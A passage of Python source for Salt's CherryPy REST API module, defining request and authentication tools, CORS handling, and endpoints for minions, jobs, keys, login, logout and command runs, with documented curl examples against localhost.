* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import os
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
..versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
..code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
success_str = ("[api_acl] Authentication sucessful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except (cherrypy.TimeoutError, salt.exceptions.SaltClientTimeout):
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
return out(ret)
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
@functools.wraps
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, collections.Mapping):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_request_body',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if cherrypy.session.get('user'):
chunk['__current_eauth_user'] = cherrypy.session.get('user')
if cherrypy.session.get('groups'):
chunk['__current_eauth_groups'] = cherrypy.session.get('groups')
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.list_job' if jid else 'jobs.list_jobs',
'jid': jid,
}]
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns.keys():
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
@cherrypy.config(**{'tools.salt_token.on': True})
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = six.moves.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, six.moves.StringIO(pub_key))
tarball.addfile(priv_key_file, six.moves.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
cherrypy.session['user'] = token['name']
if 'groups' in token:
cherrypy.session['groups'] = token['groups']
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instad,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: http
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
